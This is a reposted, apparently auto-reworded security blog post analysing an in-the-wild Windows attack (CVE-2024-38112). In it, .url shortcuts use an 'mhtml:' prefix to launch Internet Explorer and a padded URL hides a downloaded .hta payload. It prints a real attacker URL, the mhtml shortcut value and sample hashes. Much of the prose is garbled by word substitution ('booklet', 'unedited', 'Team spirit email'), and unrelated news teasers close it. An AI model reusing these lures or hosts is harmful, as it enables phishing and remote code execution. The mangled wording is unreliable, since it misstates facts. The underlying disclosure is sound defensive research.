Via Haifei Li
Take a look at Level Analysis, which recently revealed that alert actors were using booklet (or hitherto unknown) tactics to trap Windows clients for remote code execution. Specifically, the attackers defaced special Windows web shortcut information (the .url extension title) which, when clicked, would call the retired Web Explorer (IE) to consult the attacker-controlled URL. A supplementary trick is disabling the title on IE to cover the unsightly .hta extension. By opening the URL with IE instead of the popular and heavily stored Chrome/Edge browser on Windows, the attacker gained a significant advantage in exploiting the victim’s laptop, even if the computer is running on modern Windows 10/11. equipment.
For some technical background, it is no longer uncommon to see actors warned about using .url information as the initial attack vector of their campaigns. Even use-of-booklets or zero-day URL-file-related vulnerabilities have existed before – CVE-2023-36025, which was recently patched in November, is a good example.
The malicious .url samples we found ranged from January 2023 (many existed in the past) to unedited May 13, 2024 (a few days ago, as of writing). This means that the warning actors had been using attacking tactics for some time.
Let’s use the unedited .url pattern on the virus general case to explain the functionality.
Material content of pattern:
As we can see, the extreme traces of the .url file point to a custom designed icon within the Microsoft Edge utility file. msedge.exe, It may appear to point to a PDF document (although, in fact, it is not).
Importantly, as we will see, the value of URL Key phrases are somewhat different from key phrases – typically, for regular .url information, URL parameters will look like URL=https://www.google.com which issues url https://www.google.com, However on this pattern, the value is:
mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html
It uses a different prefix mhtml: and besides a !x-usc: Within the center.
A few years ago, we saw the same trick (what we call the “MHTML” trick) in the infamous CVE-2021-40444 zero-day attacks, where the file file.xml.rels Covers exactly this type of story.
We all know that the “mhtml” trick in commit documents was screwed up until now when exploiting the CVE-2021-40444 vulnerability, and now we see the same trick screwed up in .url files as well. So, what can attackers achieve by using it? Let’s do a little assessment.
If we name the pattern as Books_A0UJKO.pdf.url (title in the wild), the .url file will appear to be a reference to (fully patched) Windows 11 – a PDF appears as a hyperlink to the file.
If we act like the victim (we want to unhide the PDF), we double-click on the shortcut file. Later, the victim gets:
See what’s unusual there? Web Explorer is opened. Truth be told, with a little debugging capabilities, we were able to verify that IE was indeed unable to unhide the hyperlink. http://cbmelipilla(.)cl/te/test1.htmlWhich is specified in the .url file.
As we all know, Microsoft declared IE retired a few years ago. On traditional Windows 10/11, normal user activities such as consulting websites should not be able to unhide IE as they do not experience the same level of security as modern browsers. IE is an old-fashioned internet browser and is well known for its lack of confidence – and this is probably one of the fat reasons why Microsoft replaced it with the popular and extra store Microsoft Edge, or customers simply don’t like it. Install it and take advantage of it. Google’s Chrome browser.
Disclaimer: Despite the fact that IE has been declared “retired and out of support”, technically speaking, IE remains part of the Home Windows OS and is not “inherently insecure”, as IE still Is serviced for vulnerabilities, and considering our communications with Microsoft there should be no known exploitable security vulnerabilities.
Therefore, by default, customers should not unhide websites with IE unless the consumer specifically asks for the action to be taken and with the consumer’s full understanding.
On the other hand, on this pattern, with the “mhtml” trick, when the victim opens the .url shortcut (the victim thinks he is opening a PDF), the attacker-controlled web page is instead being opened with IE standard. Compared to Chrome/Edge.
From there (the web page being opened with IE), the attacker can do many malicious things because IE is insecure and old-fashioned. For example, if the attacker has an IE zero-day exploit – which is much easier to find than Chrome/Edge, the attacker can immediately attack the victim to achieve remote code execution. On the other hand, the alerters did not attribute any IE remote code execution exploits to the samples we analyzed. In turn, they deployed another trick in IE – which has not yet been publicly identified – to the best of our knowledge – to trick the victim into achieving remote code execution.
Let’s re-evaluate the earlier figure (highlighted below). In line with the Promoted (IE) conversation, it appears that the consumer is invited to open the PDF file named Books_A0UJKO.pdf,
On the other hand, is this the real issue here? Do you believe you are opening a PDF?
Not really. If we click “Open” (default option) in the above IE conversation, we can get any other promoted conversation (see reference). This is due to IE’s Secure Form (a fairly weak browser sandbox).
If the victim keeps forgetting about the ultimatum (because the victim thinks he or she is opening a PDF), the victim’s gadget will eventually be hacked – the “opened” file is actually a sinister .hta file that is being downloaded. Is and is being completed. ,
If we look carefully at HTTP site visitors, we can find that there are a lot of non-printable characters appended at the top. Books_A0UJKO.pdf Story. In any case, .hta is anecdotal – it’s the actual (and threatening) title extension.
This is why the IE conversation did not display the .hta file title to the consumer. The actual full URL is:
https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80.hta
With this trick, the attacker can be more successful in luring the victim to keep up with the motion when, in reality, the victim is downloading and executing a deadly .hta utility.
bd710ee53ef3ad872f3f0678117050608a8e073c87045a06a86fb4a7f0e4eff0 b16aee58b7dfaf2a612144e2c993e29dcbd59d8c20e0fd0ab75b76dd9170e104 65142c8f490839a60f4907ab8f28dd9db4258e1cfab2d48e89437ef2188a6e94 bfd59ed369057c325e517b22be505f42d60916a47e8bdcbe690210a3087d466d 22e2d84c2a9525e8c6a825fb53f2f30621c5e6c68b1051432b1c5c625ae46f8c c9f58d96ec809a75679ec3c7a61eaaf3adbbeb6613d667257517bdc41ecca9ae
We have shown that the mentioned exploit tips – which have been actively implemented in the wild for at least one presentation, working on unedited Windows 10/11 running systems.
Test Level has exempted our consumers from this e-newsletter months ago from mentioning a security called “Internet Shortcut File Remote Code Execution” on IPS and Team Spirit emails, IPS signatures, as opposed to zero-day attack protection To provide .
Team spirit email and collaboration Provides full inline coverage against zero-day attacks at the best security level.
We reported our findings to the Microsoft Security Response Center (MSRC) on Thursday, May 16, 2024. Since the following, both parties have been working closely on this topic, resulting in a waiver of Microsoft Trusted Domains (CVE-2024-38112). 9 July. It is extremely beneficial for home window clients to utilize the area once conceived.
For concerned Windows customers, we suggest being especially cautious about .url information sent from untrusted resources. As we mentioned, this type of attack requires some ultimatum (consumer negotiation).
Take a look at the level analysis to observe the activity associated with this type of attack around the world.
To summarize the attacks from an exploitation perspective: The primary method used in those campaigns is the “MHTML” trick, which allows the attacker to name IE instead of additional store Chrome/Edge. The second method is an IE trick to trick the victim into believing they are opening a PDF file, when in reality, they are downloading and executing a malware. ,HTA utility. The entire purpose of these attacks is to trick victims into believing that they are opening a PDF dossier, and this is made possible through the use of these two tactics.
This post was published on 07/09/2024 3:52 pm
Pro Football Hall of Famer Terrell Davis He has accused United Airlines of a "disgusting…
transparency market analysisThe adoption of regenerative dentistry ideas into preventive care methods revolutionizes the traditional…
The USA Basketball showcase continues this week with its second and final game in Abu…
The S&P 500 Index ($SPX) (SPY) is recently down -0.89%, the Dow Jones Industrials Index…
Emmy season is back, and Tony Hale ("Veep") and Sheryl Lee Ralph ("Abbott Elementary"), along…
Dublin, July 17, 2024 (GLOBE NEWSWIRE) -- The file "e-Prescription Systems - Global Strategic Business…